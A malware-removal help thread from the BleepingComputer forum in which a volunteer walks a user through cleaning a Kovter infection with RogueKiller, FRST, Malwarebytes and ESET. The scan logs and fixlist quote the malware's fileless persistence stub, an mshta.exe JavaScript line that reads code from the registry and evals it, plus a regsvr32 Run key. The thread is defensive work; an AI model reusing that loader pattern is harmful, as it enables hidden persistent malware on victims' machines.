Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Very persistent Kovter variant / fileless / semi-fileless malware


  • This topic is locked This topic is locked
17 replies to this topic

#1 Windfarm

Windfarm

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:06:57 AM

Posted 22 May 2017 - 07:55 AM

Greetings,

 

After several years of safe internet practices, I must have gotten complacent or careless, because MS security essentials popped up telling me I was infected with numerous trojans, of which Kovter was one.

 

Numerous attempts to self-treat were only partially successful, as each time the machine is restarted the malicious files are re-installed, (...appdata/local/Ektion/(randomname).lnk, ...Windows/temp/(randomname).exe, etc.), and startup entries try to launch.  Listed below are the malware scans I've run, and their result. 

 

My uneducated guess is this malware is "file-less", or nearly so, and full removal may require manually modifying the registry, putting it well above my ability level to solve.  I will not make any more attempts to diagnose or treat the infection until told to do so.

 

1. MS security essentials: initial detection.  Ran full scan, removed all items.  Currently running in background.

2. MWBAM: Ran full scan, found infection again, removed all items.

3. RKill: Ran.

4. Hitman Pro: Ran full scan, found infection again, removed all items.

5. Zemana: Ran full scan, found infection again, removed all items.  Currently running in background.

6. Appguard: Installed as last resort to buy time to address issue.  Currently running in background.

 

I greatly appreciate any help you can provide.  Thank you very much.

 

 



BC AdBot (Login to Remove)

 


#2 satchfan

satchfan

  • Malware Response Team
  • 2,785 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Devon, UK
  • Local time:12:57 PM

Posted 22 May 2017 - 10:40 AM

Hello Windfarm and welcome to the Bleeping Computer forum.

My name is Satchfan and I would be glad to help you with your computer problem.

Please read the following guidelines which will help to make cleaning your machine easier:

  • please follow all instructions in the order posted
  • please continue to review my answers until I tell you your machine appears to be clear. Absence of symptoms does not mean that everything is clear
  • all logs/reports, etc. must be posted in Notepad. Please ensure that word wrap is unchecked. In Notepad click Format, uncheck Word wrap if it is checked
  • if you don't understand something, please don't hesitate to ask for clarification before proceeding
  • the fixes are specific to your problem and should only be used for this issue on this machine.
  • please reply within 3 days. If you do not reply within this period I will post a reminder but topics with no reply in 4 days will be closed!

IMPORTANT:

Please DO NOT install/uninstall any programs unless asked to.
Please DO NOT run any scans other than those requested

===================================================

Note: Please run these in the order given in the instructions.

===================================================

Download and run AdwCleaner

Download AdwCleaner from here and save it to your desktop.


  • run AdwCleaner by clicking on Scan
  • when it has finished, leave everything that was found checked, (ticked), then click on Clean
  • if it asks to reboot, allow the reboot
  • on reboot a log will be produced; please attach the content of the log to your next reply.

===================================================

Run RogueKiller

IMPORTANT: Please remove any usb or external drives from the computer before you run this scan!

Close all running programs.


Download RogueKiller to your desktop

  • close all running programs
  • for Windows Vista/Seven, right click -> run as administrator, for XP simply double-click on RogueKiller.exe
  • when the pre-scan is finished, click on Scan
  • click on Report and copy/paste the content in your next post
  • NOTE: DO NOT attempt to remove anything that the scan detects –everything that is reported is not necessarily bad

If the program is blocked, continue to try it several times. If it still doesn’t work, (it could happen), rename it to winlogon.exe.

Please post the contents of the RKreport.txt in your next reply.

===================================================

Run Farbar Recovery Scan Tool

Please download Farbar Recovery Scan Tool and save it to your Desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

  • right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
  • press Scan button
  • it will produce a log called Frst.txt in the same directory the tool is run from
  • please copy and paste log back here.
  • the first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please also paste that along with the Frst.txt into your reply.

Logs to include with next post:

AdwCleaner log
RKreport.txt
Frst.txt
Addition.txt


Thanks

Satchfan

 


My help is always free of charge. If you are happy with the help provided, if you wish you can make a donation to buy me a beer.


#3 Windfarm

Windfarm
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:06:57 AM

Posted 22 May 2017 - 11:25 AM

Thank you very much for the quick reply, Satchfan.  Quick question: would you prefer the logs attached to, or copied/pasted within the body of my next reply?

 

Thanks.



#4 Windfarm

Windfarm
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:06:57 AM

Posted 22 May 2017 - 01:09 PM

Satchfan,

 

The requested log files are attached.

 

Thank you.

 

Attached File  AdwCleaner log.txt   1.83KB   3 downloads

 

Attached File  RKreport.txt   6.54KB   2 downloads

 

Attached File  FRST.txt   100.64KB   1 downloads

 

Attached File  Addition.txt   47.02KB   1 downloads



#5 satchfan

satchfan

  • Malware Response Team
  • 2,785 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Devon, UK
  • Local time:12:57 PM

Posted 22 May 2017 - 04:24 PM

Thank you for the logs. In future, please copy/paste them into the reply - thanks.

I can see from your logs that you have Combofix on your computer. This is an extremely powerful tool which should only be used when instructed to do so by someone who has been properly trained. ComboFix is intended by its creator to be "used under the guidance and supervision of an expert", NOT for private use. Using this tool incorrectly could lead to disastrous problems with your operating system such as preventing it from ever starting again..

I’ll give you instructions on uninstalling it when your computer is clean.

Let's clear up what was found so far.

================================================

Please uninstall Kaspersky Security Scan and any other Kaspersky products

================================================

Run RogueKiller

IMPORTANT: Do not reboot your computer if at all possible otherwise the malware will reactivate and you will have to run RogueKiller again

  • close all programs
  • double-click RogueKiller.exe - Windows 7/8//10: right-click the program and select Run as Administrator'
  • after it has completed it's prescan, click on Scan
  • when the scan is finished press the Delete button and post the log it produces.

Please then run it again and send the new log.

================================================

Run Farbar Recovery Scan Tool

Open notepad. Please copy the contents of the code box below and paste it into Notepad.

CloseProcesses:
HKU\S-1-5-21-956152210-3627048645-3905910164-1000\...\Run: [YWPack] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\Admin\AppData\Local\Ektion\zgkbubwn.dll <===== ATTENTION
GroupPolicy: Restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-956152210-3627048645-3905910164-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
S4 LMIRfsClientNP; no ImagePath
S3 ALSysIO; \??\C:\Users\Admin\AppData\Local\Temp\ALSysIO64.sys [X] <==== ATTENTION
S3 catchme; \??\C:\ComboFix\catchme.sys [X]    
S3 cpuz135; \??\C:\Windows\TEMP\cpuz135\cpuz135_x64.sys [X]
S2 LMIInfo; \??\C:\Program Files (x86)\LogMeIn\x64\RaInfo.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
2017-05-21 17:49 - 2017-05-21 17:49 - 00120320 _____ C:\Users\Mcx1-PC\AppData\Local\GDIPFONTCACHEV1.DAT
2017-05-20 18:34 - 2017-05-20 18:34 - 02744744 _____ (Symantec Corporation) C:\Users\Administrator\Desktop\FixTool64.exe
Task: {29005687-7EC2-40C4-A8A1-B05976B729C8} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {5990F873-AE8F-4020-A269-C4E117F5D2A9} - \Microsoft\Windows\Setup\gwx\runappraiser -> No File <==== ATTENTION
Task: {64C1B86A-666E-4648-A56C-BBF88902E3E1} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {BC6FE6F9-C856-41F3-928D-603D34094AC2} - System32\Tasks\{08CA944D-EAE2-4743-A38C-A34D2605F607} => pcalua.exe -a C:\Users\Admin\AppData\Local\Temp\jre-8u51-windows-au.exe -d C:\Windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1 <==== ATTENTION
AlternateDataStreams: C:\Users\Admin\Cookies:nM6UdAqXZyq51ts55IZYj1ZqUqCq5 [2302]
AlternateDataStreams: C:\Users\Admin\Cookies:xbDQxNXdcIhlabyq6nrvbNA [2320]
AlternateDataStreams: C:\ProgramData\Microsoft:3k2TJ6LTDO4zhWY7BOFUdEJXC [2404]
AlternateDataStreams: C:\ProgramData\Microsoft:BuJtUrpdimfQQW4sRIuH [2282]
AlternateDataStreams: C:\ProgramData\Microsoft:kQsCR3MW3YwHkIIAmhlFxJp89xB [2222]
AlternateDataStreams: C:\ProgramData\Microsoft:LQG3MvKXbbetZEkdKRI4Wb [2384]
AlternateDataStreams: C:\ProgramData\Microsoft:mWfaJWGxRXC3y8dM9eDw8QjbBc [2284]
AlternateDataStreams: C:\ProgramData\TEMP:054203E4 [149]
HKU\.DEFAULT\Software\Classes\dca127: "C:\Windows\system32\mshta.exe" "javascript:AlVEO0W="iGY0hFQ";r0p=new ActiveXObject("WScript.Shell");hNS1G="3OC";GC5aA=r0p.RegRead("HKCU\\software\\efypohco\\gusikgprg");pQeHF4h="m7WJc";eval(GC5aA);gD3MPS="TbD";" <===== ATTENTION
C:\Users\Admin\AppData\Local\Ektion
C:\Users\Admin\AppData\Local\Temp\ALSysIO64.sys
C:\Users\Admin\AppData\Local\Temp\jre-8u51-windows-au.exe -d
EmptyTemp:

NOTE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

  • save the files as fixlist.txt in the same folder as FRST – NOTE: It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work
  • run FRST64 then click Fix just once and wait
  • it will create a log on your desktop, (Fixlog.txt); please post it to your reply.

Logs to include with next post:

RK fix log
New RKreport.txt
Fixlog.txt


Thanks

Satchfan

 


My help is always free of charge. If you are happy with the help provided, if you wish you can make a donation to buy me a beer.


#6 Windfarm

Windfarm
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:06:57 AM

Posted 22 May 2017 - 06:08 PM

Thank you Satchfan.  Kaspersky utility and updater uninstalled, logs attached.

 

RKfixlog.txt:

Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Admin [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Delete -- Date : 05/22/2017 16:42:11 (Duration : 00:11:42)

¤¤¤ Processes : 1 ¤¤¤
[VT.Unknown] TorGuardService.exe(2956) -- C:\Program Files\TorGuard.Viscosity\TorGuardService.exe[7] -> Found

¤¤¤ Registry : 8 ¤¤¤
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-956152210-3627048645-3905910164-1000\Software\Microsoft\Windows\CurrentVersion\Run | YWPack : C:\Windows\SysWOW64\regsvr32.exe C:\Users\Admin\AppData\Local\Ektion\zgkbubwn.dll [x] -> Deleted
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-956152210-3627048645-3905910164-1000\Software\Microsoft\Windows\CurrentVersion\Run | YWPack : C:\Windows\SysWOW64\regsvr32.exe C:\Users\Admin\AppData\Local\Ektion\zgkbubwn.dll [x] -> ERROR [2]
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-956152210-3627048645-3905910164-1000\Software\Microsoft\Internet Explorer\Main | Start Page :
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-956152210-3627048645-3905910164-1000\Software\Microsoft\Internet Explorer\Main | Start Page :
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{7947F786-94CF-435B-BBB0-68A8A0880EB6} | DhcpNameServer : 10.9.0.1 10.8.0.1 ([][])  -> Replaced ()
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{7947F786-94CF-435B-BBB0-68A8A0880EB6} | DhcpNameServer : 10.9.0.1 10.8.0.1 ([][])  -> Replaced ()
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-956152210-3627048645-3905910164-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Replaced (1)
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-956152210-3627048645-3905910164-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Replaced (1)

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: Samsung SSD 840 PRO Seri +++++
--- User ---
[MBR] 97871e56c789aaaee1f000289cdae1e0
[BSP] 67e04b63423c8c70142e5ac10665cc29 : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 244096 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: Samsung SSD 840 Series +++++
--- User ---
[MBR] 40da082b95aec55a5d51749f8ab8943d
[BSP] c609717eb0e4772a5dd00bcbc6648423 : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 238473 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

 

New RKreport.txt:

RogueKiller V12.10.10.0 (x64) [May 22 2017] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : https://forum.adlice.com
Website : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Admin [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Scan -- Date : 05/22/2017 16:58:55 (Duration : 00:11:36)

¤¤¤ Processes : 1 ¤¤¤
[VT.Unknown] TorGuardService.exe(2956) -- C:\Program Files\TorGuard.Viscosity\TorGuardService.exe[7] -> Found

¤¤¤ Registry : 0 ¤¤¤

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: Samsung SSD 840 PRO Seri +++++
--- User ---
[MBR] 97871e56c789aaaee1f000289cdae1e0
[BSP] 67e04b63423c8c70142e5ac10665cc29 : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 244096 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: Samsung SSD 840 Series +++++
--- User ---
[MBR] 40da082b95aec55a5d51749f8ab8943d
[BSP] c609717eb0e4772a5dd00bcbc6648423 : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 238473 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

Fixlog.txt:

Fix result of Farbar Recovery Scan Tool (x64) Version: 20-05-2017
Ran by Admin (22-05-2017 17:20:46) Run:1
Running from C:\Users\Admin\Desktop
Loaded Profiles: Admin (Available Profiles: Admin & Mcx1-PC & Administrator)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:
HKU\S-1-5-21-956152210-3627048645-3905910164-1000\...\Run: [YWPack] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\Admin\AppData\Local\Ektion\zgkbubwn.dll <===== ATTENTION
GroupPolicy: Restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-956152210-3627048645-3905910164-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
S4 LMIRfsClientNP; no ImagePath
S3 ALSysIO; \??\C:\Users\Admin\AppData\Local\Temp\ALSysIO64.sys [X] <==== ATTENTION
S3 catchme; \??\C:\ComboFix\catchme.sys [X]    
S3 cpuz135; \??\C:\Windows\TEMP\cpuz135\cpuz135_x64.sys [X]
S2 LMIInfo; \??\C:\Program Files (x86)\LogMeIn\x64\RaInfo.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
2017-05-21 17:49 - 2017-05-21 17:49 - 00120320 _____ C:\Users\Mcx1-PC\AppData\Local\GDIPFONTCACHEV1.DAT
2017-05-20 18:34 - 2017-05-20 18:34 - 02744744 _____ (Symantec Corporation) C:\Users\Administrator\Desktop\FixTool64.exe
Task: {29005687-7EC2-40C4-A8A1-B05976B729C8} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {5990F873-AE8F-4020-A269-C4E117F5D2A9} - \Microsoft\Windows\Setup\gwx\runappraiser -> No File <==== ATTENTION
Task: {64C1B86A-666E-4648-A56C-BBF88902E3E1} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {BC6FE6F9-C856-41F3-928D-603D34094AC2} - System32\Tasks\{08CA944D-EAE2-4743-A38C-A34D2605F607} => pcalua.exe -a C:\Users\Admin\AppData\Local\Temp\jre-8u51-windows-au.exe -d C:\Windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1 <==== ATTENTION
AlternateDataStreams: C:\Users\Admin\Cookies:nM6UdAqXZyq51ts55IZYj1ZqUqCq5 [2302]
AlternateDataStreams: C:\Users\Admin\Cookies:xbDQxNXdcIhlabyq6nrvbNA [2320]
AlternateDataStreams: C:\ProgramData\Microsoft:3k2TJ6LTDO4zhWY7BOFUdEJXC [2404]
AlternateDataStreams: C:\ProgramData\Microsoft:BuJtUrpdimfQQW4sRIuH [2282]
AlternateDataStreams: C:\ProgramData\Microsoft:kQsCR3MW3YwHkIIAmhlFxJp89xB [2222]
AlternateDataStreams: C:\ProgramData\Microsoft:LQG3MvKXbbetZEkdKRI4Wb [2384]
AlternateDataStreams: C:\ProgramData\Microsoft:mWfaJWGxRXC3y8dM9eDw8QjbBc [2284]
AlternateDataStreams: C:\ProgramData\TEMP:054203E4 [149]
HKU\.DEFAULT\Software\Classes\dca127: "C:\Windows\system32\mshta.exe" "javascript:AlVEO0W="iGY0hFQ";r0p=new ActiveXObject("WScript.Shell");hNS1G="3OC";GC5aA=r0p.RegRead("HKCU\\software\\efypohco\\gusikgprg");pQeHF4h="m7WJc";eval(GC5aA);gD3MPS="TbD";" <===== ATTENTION
C:\Users\Admin\AppData\Local\Ektion
C:\Users\Admin\AppData\Local\Temp\ALSysIO64.sys
C:\Users\Admin\AppData\Local\Temp\jre-8u51-windows-au.exe -d
EmptyTemp:
*****************

Processes closed successfully.
HKU\S-1-5-21-956152210-3627048645-3905910164-1000\Software\Microsoft\Windows\CurrentVersion\Run\\YWPack => value not found.
C:\Windows\system32\GroupPolicy\Machine => moved successfully
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => key removed successfully
HKU\S-1-5-21-956152210-3627048645-3905910164-1000\SOFTWARE\Policies\Microsoft\Internet Explorer => key removed successfully
HKLM\System\CurrentControlSet\Services\LMIRfsClientNP => key removed successfully
LMIRfsClientNP => service removed successfully
HKLM\System\CurrentControlSet\Services\ALSysIO => key removed successfully
ALSysIO => service removed successfully
HKLM\System\CurrentControlSet\Services\catchme => key removed successfully
catchme => service removed successfully
HKLM\System\CurrentControlSet\Services\cpuz135 => key removed successfully
cpuz135 => service removed successfully
HKLM\System\CurrentControlSet\Services\LMIInfo => key removed successfully
LMIInfo => service removed successfully
HKLM\System\CurrentControlSet\Services\VGPU => key removed successfully
VGPU => service removed successfully
C:\Users\Mcx1-PC\AppData\Local\GDIPFONTCACHEV1.DAT => moved successfully
C:\Users\Administrator\Desktop\FixTool64.exe => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{29005687-7EC2-40C4-A8A1-B05976B729C8} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{29005687-7EC2-40C4-A8A1-B05976B729C8} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5990F873-AE8F-4020-A269-C4E117F5D2A9} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5990F873-AE8F-4020-A269-C4E117F5D2A9} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\runappraiser => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{64C1B86A-666E-4648-A56C-BBF88902E3E1} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{64C1B86A-666E-4648-A56C-BBF88902E3E1} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BC6FE6F9-C856-41F3-928D-603D34094AC2} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BC6FE6F9-C856-41F3-928D-603D34094AC2} => key removed successfully
C:\Windows\System32\Tasks\{08CA944D-EAE2-4743-A38C-A34D2605F607} => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{08CA944D-EAE2-4743-A38C-A34D2605F607} => key removed successfully
C:\Users\Admin\Cookies => ":nM6UdAqXZyq51ts55IZYj1ZqUqCq5" ADS removed successfully.
C:\Users\Admin\Cookies => ":xbDQxNXdcIhlabyq6nrvbNA" ADS removed successfully.
C:\ProgramData\Microsoft => ":3k2TJ6LTDO4zhWY7BOFUdEJXC" ADS removed successfully.
C:\ProgramData\Microsoft => ":BuJtUrpdimfQQW4sRIuH" ADS removed successfully.
C:\ProgramData\Microsoft => ":kQsCR3MW3YwHkIIAmhlFxJp89xB" ADS removed successfully.
C:\ProgramData\Microsoft => ":LQG3MvKXbbetZEkdKRI4Wb" ADS removed successfully.
C:\ProgramData\Microsoft => ":mWfaJWGxRXC3y8dM9eDw8QjbBc" ADS removed successfully.
C:\ProgramData\TEMP => ":054203E4" ADS removed successfully.
HKU\.DEFAULT\Software\Classes\dca127 => key removed successfully
C:\Users\Admin\AppData\Local\Ektion => moved successfully
"C:\Users\Admin\AppData\Local\Temp\ALSysIO64.sys" => not found.
"C:\Users\Admin\AppData\Local\Temp\jre-8u51-windows-au.exe -d" => not found.

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 10936458 B
Java, Flash, Steam htmlcache => 198604174 B
Windows/system/drivers => 18448420 B
Edge => 0 B
Chrome => 121288626 B
Firefox => 51703027 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 153331 B
systemprofile32 => 37277536 B
LocalService => 132244 B
NetworkService => 73842 B
Admin => 64168842 B
UpdatusUser => 0 B
UpdatusUser => 0 B
LogMeInRemoteUser => 0 B
Mcx1-PC => 306786 B
Administrator => 476428 B

RecycleBin => 134280327 B
EmptyTemp: => 616.3 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 17:20:56 ====

 

 

 

 

Attached Files



#7 satchfan

satchfan

  • Malware Response Team
  • 2,785 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Devon, UK
  • Local time:12:57 PM

Posted 23 May 2017 - 06:29 AM

That looks better.

Run Malwarebytes Anti-Malware

Please download and run the installer for Malwarebytes 3.0.

  • follow the prompts to install the program, (Malwarebytes 3.0 will automatically upgrade Malwarebytes Anti-Malware 2.x to Malwarebytes 3.0)
  • at the end, be sure a checkmark is placed next to the following
    • Launch Malwarebytes Anti-Malware
    • a 14 day trial of the Premium features is pre-selected: deselect this if you don’t want it, (it won’t diminish the scanning and removal capabilities of the program).
  • click Finish.
  • on the Dashboard, click Update Now
  • after the update completes, click the Scan Now' button.
  • if an update is available, clicking the Update Now button will update it
  • a Threat Scan will begin.
  • when the scan is complete, if malware has been detected, click Apply Actions to allow MBAM to clean what was found
  • when the prompt to restart the computer appears, click Yes.
  • after the restart once you are back at your desktop, open MBAM once more
  • click on the ‘History’ tab, the ‘Application Logs’
  • double-click on the scan log which shows the date and time of the scan just performed.
  • click Copy to Clipboard
  • please paste the contents of the clipboard into your reply.

Can you tell me how things are now.

Satchfan

 


My help is always free of charge. If you are happy with the help provided, if you wish you can make a donation to buy me a beer.


#8 Windfarm

Windfarm
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:06:57 AM

Posted 23 May 2017 - 07:09 AM

Good morning Sacthfan.  Agreed - much better, thanks to you.

 

MBAM scan came back clean:

 

Scan results:

Result: Completed
Objects Scanned: 451032
Threats Detected: 0
(No malicious items detected)
Threats Quarantined: 0
(No malicious items detected)
Time Elapsed: 4 min, 7 sec

-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Disabled
PUM: Enabled

-Scan Details-
Process: 0
(No malicious items detected)

Module: 0
(No malicious items detected)

Registry Key: 0
(No malicious items detected)

Registry Value: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Data Stream: 0
(No malicious items detected)

Folder: 0
(No malicious items detected)

File: 0
(No malicious items detected)

Physical Sector: 0
(No malicious items detected)


(end)



#9 Windfarm

Windfarm
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:06:57 AM

Posted 23 May 2017 - 07:12 AM

The last log was incomplete; drinking coffee now.

 

MBAM Log:

Malwarebytes
www.malwarebytes.com

-Log Details-
Scan Date: 5/23/17
Scan Time: 7:02 AM
Log File:
Administrator: Yes

-Software Information-
Version: 3.1.2.1733
Components Version: 1.0.122
Update Package Version: 1.0.2003
License: Trial

-System Information-
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: PC\Admin

-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 451032
Threats Detected: 0
(No malicious items detected)
Threats Quarantined: 0
(No malicious items detected)
Time Elapsed: 4 min, 7 sec

-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Disabled
PUM: Enabled

-Scan Details-
Process: 0
(No malicious items detected)

Module: 0
(No malicious items detected)

Registry Key: 0
(No malicious items detected)

Registry Value: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Data Stream: 0
(No malicious items detected)

Folder: 0
(No malicious items detected)

File: 0
(No malicious items detected)

Physical Sector: 0
(No malicious items detected)


(end)



#10 satchfan

satchfan

  • Malware Response Team
  • 2,785 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Devon, UK
  • Local time:12:57 PM

Posted 23 May 2017 - 08:24 AM

Let’s run an online scan to be sure nothing is left.


Run ESET Online Scan

Note: This may take a long time so please be patient.

IMPORTANT Please make sure you uncheck the box next to Remove found threats. Eset will detect anything that looks even slightly suspicious, which could include legitimate program files. If you do not uncheck the box, Eset will automatically remove all suspicious files which could leave some of your software inoperable.

Note: You can use Internet Explorer, FireFox or Chrome for this scan. You will however need to disable your current installed Anti-Virus, how to do so can be read here.

Hold down Control and click on the following link to open ESET OnlineScan in a new window.

ESET OnlineScan

  • click the Run Eset online Scanner button
  • for alternate browsers only: (Microsoft Internet Explorer users can skip these steps)


    o    click on esetinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
    o    double click on the Eset installer icon on your desktop.
     

  • check Yes, I accept the Terms of Use
  • click the Start button
  • accept any security warnings from your browser
  • check Enable detection of potentially unwanted applications
  • click Advanced settings and select the following:


    o    scan archives
    o    scan for potentially unsafe applications
    o    enable Anti-Stealth technology


    Note: Do not check Remove found threats
     

  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • when the scan completes, push List of found threats
  • push Export to Text file and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.


    Note - if ESET doesn't find any threats, no report will be created.
     

  • push the back button.
  • push Finish

When the scan is complete:

If no threats were found:


o    put a checkmark in "Uninstall application on close"
o    close program
o    report to me that nothing was found.
 

If threats were found:


o    click on "list of threats found"
o    click on "export to text file" and save it as ESET results and save to the desktop
o    click on back
o    put a checkmark in "Uninstall application on close"
o    click on finish
o    close program
o    copy and paste the report here
 

